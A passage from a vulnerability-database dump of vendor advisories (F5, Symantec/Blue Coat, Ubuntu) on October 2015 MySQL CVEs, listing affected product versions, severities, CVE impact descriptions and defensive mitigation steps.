Development has assigned ID 502493 (BIG-IP) and ID 556684 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H59010802 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP AAM| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.0| None| Medium| MySQL \nBIG-IP AFM| 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.0| None| Medium| MySQL \nBIG-IP Analytics| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.0| None| Medium| MySQL \nBIG-IP APM| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP ASM| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP DNS| 13.0.0 \n12.0.0 - 12.1.2| None| Medium| MySQL \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP GTM| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP Link Controller| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP PEM| 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.0| None| Medium| MySQL \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Medium| MySQL \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Medium| MySQL \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability for BIG-IP and Enterprise Manager systems, you should permit management access to F5 products only over a secure network, and limit shell access to only trusted users. For more information, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>). \n \nAdditionally, for Enterprise Manager, you should avoid enabling the Remote Access feature to provide remote access to the statistical database. If you have the Remote Access feature enabled, you should disable it by performing the following procedure: \n \n**Disabling the Remote Access feature** \n \n**Impact of action**: You will no longer be allowed to remotely access the MySQL statistical database.\n\n 1. Log in to the Enterprise Manager Configuration utility.\n 2. Click **Enterprise Management**.\n 3. Navigate to **Options** > **Statistics** > **Remote Access**.\n 4. Clear the **Allow Remote Access** check box.\n 5. Click **Save Changes**.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n", "modified": "2017-07-06T08:33:00", "published": "2015-12-16T02:17:00", "href": "https://support.f5.com/csp/article/K59010802", "id": "F5:K59010802", "title": "Multiple MySQL vulnerabilities", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:09:45", "bulletinFamily": "software", "cvelist": ["CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4864", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4800", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4833", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-4890"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the** Severity** values published in the previous table. The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability for BIG-IP and Enterprise Manager systems, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users. For more information, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x) and SOL13092: Overview of securing access to the BIG-IP system. \n \nAdditionally, for Enterprise Manager, you should avoid enabling the Remote Access feature to provide remote access to the statistical database. If you have the Remote Access feature enabled, you should disable it by performing the following procedure: \n \n**Disabling the Remote Access feature** \n \n**Impact of action**: You will no longer be allowed to remotely access the MySQL statistical database.\n\n 1. Log in to the Enterprise Manager Configuration utility.\n 2. Click **Enterprise Management**.\n 3. Navigate to **Options** > **Statistics** > **Remote Access**.\n 4. Clear the **Allow Remote Access** check box.\n 5. Click **Save Changes**.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2015-12-15T00:00:00", "published": "2015-12-15T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/59/sol59010802.html", "id": "SOL59010802", "title": "SOL59010802 - Multiple MySQL vulnerabilities", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T00:16:32", "bulletinFamily": "software", "cvelist": ["CVE-2015-4791", "CVE-2015-4904", "CVE-2015-4807", "CVE-2015-4766"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 \n11.4.0 - 11.6.0| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 \n11.0.0 - 11.6.0| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 \n11.0.0 - 11.6.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 \n11.3.0 - 11.6.0| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.0.0 - 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2016-01-09T02:32:00", "published": "2015-12-04T00:30:00", "href": "https://support.f5.com/csp/article/K86326526", "id": "F5:K86326526", "title": "MySQL vulnerabilities CVE-2015-4766, CVE-2015-4904, CVE-2015-4791, and CVE-2015-4807", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-03-19T09:02:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-4791", "CVE-2015-4904", "CVE-2015-4807", "CVE-2015-4766"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2015-12-03T00:00:00", "published": "2015-12-03T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/86/sol86326526.html", "id": "SOL86326526", "title": "SOL86326526 - MySQL vulnerabilities CVE-2015-4766, CVE-2015-4904, CVE-2015-4791, and CVE-2015-4807", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}], "symantec": [{"lastseen": "2020-12-24T10:41:52", "bulletinFamily": "software", "cvelist": ["CVE-2015-4730", "CVE-2015-4766", "CVE-2015-4791", "CVE-2015-4792", "CVE-2015-4800", "CVE-2015-4802", "CVE-2015-4807", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4833", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4862", "CVE-2015-4864", "CVE-2015-4866", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4890", "CVE-2015-4895", "CVE-2015-4904", "CVE-2015-4905", "CVE-2015-4910", "CVE-2015-4913"], "description": "### SUMMARY\n\nBlue Coat products using affected versions of MySQL 5.5 and 5.6 are susceptible to multiple vulnerabilities. An attacker can exploit these vulnerabilities to execute arbitrary code and gain unauthorized read, insert, update, or delete access to subsets of MySQL Server accessible data. The attacker can also cause denial of service through application crashes.\n\n### AFFECTED PRODUCTS\n\n**Malware Analysis Appliance** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2015-4792, CVE-2015-4800, \nCVE-2015-4802, CVE-2015-4815, \nCVE-2015-4816, CVE-2015-4819, \nCVE-2015-4826, CVE-2015-4830, \nCVE-2015-4836, CVE-2015-4858, \nCVE-2015-4861, CVE-2015-4864, \nCVE-2015-4870, CVE-2015-4879, \nCVE-2015-4913 | 4.2 | Upgrade to 4.2.8. \n \n### \n\n### ADDITIONAL PRODUCT INFORMATION\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP.\n\nThe following products are not vulnerable: \n**Advanced Secure Gateway \nAndroid Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nContent Analysis System \nDirector \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nMail Threat Defense \nManagement Center \nNorman Shark Industrial Control System Protection \nNorman Shark Network Protection \nNorman Shark SCADA Protection \nPacketShaper \nPacketShaper S-Series \nPolicyCenter \nPolicyCenter S-Series \nProxyClient \nProxyAV \nProxyAV ConLog and ConLogXP \nProxySG \nReporter \nSecurity Analytics \nSSL Visibility \nUnified Agent \nX-Series XOS**\n\n### ISSUES\n\n**CVE-2015-4730** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77199](<https://www.securityfocus.com/bid/77199>) / NVD: [CVE-2015-4730](<https://nvd.nist.gov/vuln/detail/CVE-2015-4730>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Types sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4766** \n--- \n**Severity / CVSSv2** | Low / 1.9 (AV:L/AC:M/Au:N/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77232](<https://www.securityfocus.com/bid/77232>) / NVD: [CVE-2015-4766](<https://nvd.nist.gov/vuln/detail/CVE-2015-4766>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Security: Firewall sub-component allows a local attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4791** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77213](<https://www.securityfocus.com/bid/77213>) / NVD: [CVE-2015-4791](<https://nvd.nist.gov/vuln/detail/CVE-2015-4791>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Security: Privileges sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4792** \n--- \n**Severity / CVSSv2** | Low / 1.7 (AV:N/AC:H/Au:M/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77171](<https://www.securityfocus.com/bid/77171>) / NVD: [CVE-2015-4792](<https://nvd.nist.gov/vuln/detail/CVE-2015-4792>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Partition sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4800** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77216](<https://www.securityfocus.com/bid/77216>) / NVD: [CVE-2015-4800](<https://nvd.nist.gov/vuln/detail/CVE-2015-4800>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Optimizer sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4802** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77165](<https://www.securityfocus.com/bid/77165>) / NVD: [CVE-2015-4802](<https://nvd.nist.gov/vuln/detail/CVE-2015-4802>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Partition sub-component allows a remote authenticated attacker to cause the server application to hang to repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4807** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77205](<https://www.securityfocus.com/bid/77205>) / NVD: [CVE-2015-4807](<https://nvd.nist.gov/vuln/detail/CVE-2015-4807>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Query Cache sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4815** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77222](<https://www.securityfocus.com/bid/77222>) / NVD: [CVE-2015-4815](<https://nvd.nist.gov/vuln/detail/CVE-2015-4815>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: DDL sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4816** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77134](<https://www.securityfocus.com/bid/77134>) / NVD: [CVE-2015-4816](<https://nvd.nist.gov/vuln/detail/CVE-2015-4816>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: InnoDB sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4819** \n--- \n**Severity / CVSSv2** | High / 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 77196](<https://www.securityfocus.com/bid/77196>) / NVD: [CVE-2015-4819](<https://nvd.nist.gov/vuln/detail/CVE-2015-4819>) \n**Impact** | Code execution \n**Description** | A flaw in the Client programs sub-component allows a local attacker to execute arbitrary code. \n \n \n\n**CVE-2015-4826** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N) \n**References** | SecurityFocus: [BID 77237](<https://www.securityfocus.com/bid/77237>) / NVD: [CVE-2015-4826](<https://nvd.nist.gov/vuln/detail/CVE-2015-4826>) \n**Impact** | Information disclosure \n**Description** | A flaw in the Server: Types sub-component allows a remote authenticated attacker to gain unauthorized read access to a subset of data. \n \n \n\n**CVE-2015-4830** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:P/A:N) \n**References** | SecurityFocus: [BID 77228](<https://www.securityfocus.com/bid/77228>) / NVD: [CVE-2015-4830](<https://nvd.nist.gov/vuln/detail/CVE-2015-4830>) \n**Impact** | Unauthorized modification of data \n**Description** | A flaw in the Server: Security: Privileges sub-component allows a remote authenticated attacker to gain unauthorized update, insert, or delete access to a subset of data. \n \n \n\n**CVE-2015-4833** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77170](<https://www.securityfocus.com/bid/77170>) / NVD: [CVE-2015-4833](<https://nvd.nist.gov/vuln/detail/CVE-2015-4833>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Partition sub-component allows a remote authenticated attacker to cause the server application to hang to repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4836** \n--- \n**Severity / CVSSv2** | Low / 2.8 (AV:N/AC:M/Au:M/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77190](<https://www.securityfocus.com/bid/77190>) / NVD: [CVE-2015-4836](<https://nvd.nist.gov/vuln/detail/CVE-2015-4836>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: SP sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4858** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77145](<https://www.securityfocus.com/bid/77145>) / NVD: [CVE-2015-4858](<https://nvd.nist.gov/vuln/detail/CVE-2015-4858>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: DML sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4861** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77137](<https://www.securityfocus.com/bid/77137>) / NVD: [CVE-2015-4861](<https://nvd.nist.gov/vuln/detail/CVE-2015-4861>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: InnoDB sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4862** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77147](<https://www.securityfocus.com/bid/77147>) / NVD: [CVE-2015-4862](<https://nvd.nist.gov/vuln/detail/CVE-2015-4862>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: DML sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4864** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:P/A:N) \n**References** | SecurityFocus: [BID 77187](<https://www.securityfocus.com/bid/77187>) / NVD: [CVE-2015-4864](<https://nvd.nist.gov/vuln/detail/CVE-2015-4864>) \n**Impact** | Unauthorized modification of data \n**Description** | A flaw in the Server: Security:Privileges sub-component allows a remote authenticated attacker to gain unauthorized update, insert, or delete access to a subset of data. \n \n \n\n**CVE-2015-4866** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77132](<https://www.securityfocus.com/bid/77132>) / NVD: [CVE-2015-4866](<https://nvd.nist.gov/vuln/detail/CVE-2015-4866>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: InnoDB sub-component allows a remote authenticated attacker to cause the server to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4870** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77208](<https://www.securityfocus.com/bid/77208>) / NVD: [CVE-2015-4870](<https://nvd.nist.gov/vuln/detail/CVE-2015-4870>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Parser sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4879** \n--- \n**Severity / CVSSv2** | Medium / 4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) \n**References** | SecurityFocus: [BID 77140](<https://www.securityfocus.com/bid/77140>) / NVD: [CVE-2015-4879](<https://nvd.nist.gov/vuln/detail/CVE-2015-4879>) \n**Impact** | Code execution \n**Description** | A flaw in the Server: DML sub-component allows a remote authenticated attacker to take over MySQL Server and possibly execute arbitrary code. \n \n \n\n**CVE-2015-4890** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77231](<https://www.securityfocus.com/bid/77231>) / NVD: [CVE-2015-4890](<https://nvd.nist.gov/vuln/detail/CVE-2015-4890>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Replication sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4895** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77136](<https://www.securityfocus.com/bid/77136>) / NVD: [CVE-2015-4895](<https://nvd.nist.gov/vuln/detail/CVE-2015-4895>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: InnoDB sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4904** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77219](<https://www.securityfocus.com/bid/77219>) / NVD: [CVE-2015-4904](<https://nvd.nist.gov/vuln/detail/CVE-2015-4904>) \n**Impact** | Denial of service \n**Description** | A flaw in the libmysqld sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4905** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77143](<https://www.securityfocus.com/bid/77143>) / NVD: [CVE-2015-4905](<https://nvd.nist.gov/vuln/detail/CVE-2015-4905>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: DML sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4910** \n--- \n**Severity / CVSSv2** | Low / 2.1 (AV:N/AC:H/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77234](<https://www.securityfocus.com/bid/77234>) / NVD: [CVE-2015-4910](<https://nvd.nist.gov/vuln/detail/CVE-2015-4910>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Memcached sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4913** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77153](<https://www.securityfocus.com/bid/77153>) / NVD: [CVE-2015-4913](<https://nvd.nist.gov/vuln/detail/CVE-2015-4913>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: DML sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n### \n\n### REFERENCES\n\nOracle Critical Patch Update Advisory (October 2015) - <https://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html#AppendixMSQL>\n\n### REVISION\n\n2016-11-01 Vulnerability inquiries for DLP should be addressed to Digital Guardian technical support. SA status moved to Final. \n2016-06-11 PolicyCenter S-Series is not vulnerable. \n2016-05-11 No Cloud Data Protection products are vulnerable. \n2016-04-24 Mail Threat Defense is not vulnerable. \n2016-03-10 A fix for MAA 4.2 is available in 4.2.8. It was previously reported that MAA 4.2 is vulnerable to CVE-2015-4730, CVE-2015-4766, CVE-2015-4791, CVE-2015-4807, CVE-2015-4833, CVE-2015-4862, CVE-2015-4866, CVE-2015-4890, CVE-2015-4895, CVE-2015-4904, CVE-2015-4905, and CVE-2015-4910. Further investigation has shown that MAA 4.2 is not vulnerable to those CVEs. \n2015-12-17 initial public release\n", "modified": "2020-03-03T19:57:36", "published": "2015-12-17T08:00:00", "id": "SMNTC-1341", "href": "", "type": "symantec", "title": "SA106 : MySQL Vulnerabilities October 2015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:42:18", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4895", "CVE-2015-4866", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4864", "CVE-2015-4910", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4800", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4904", "CVE-2015-4833", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4766", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-4890"], "description": "Multiple security issues were discovered in MySQL and this update includes \nnew upstream MySQL versions to fix these issues.\n\nMySQL has been updated to 5.5.46 in Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. \nUbuntu 15.04 and Ubuntu 15.10 have been updated to MySQL 5.6.27.\n\nIn addition to security fixes, the updated packages contain bug fixes, \nnew features, and possibly incompatible changes.\n\nPlease see the following for more information: \n<http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html> \n<http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html> \n<http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-26.html> \n<http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-27.html> \n<http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html>", "edition": 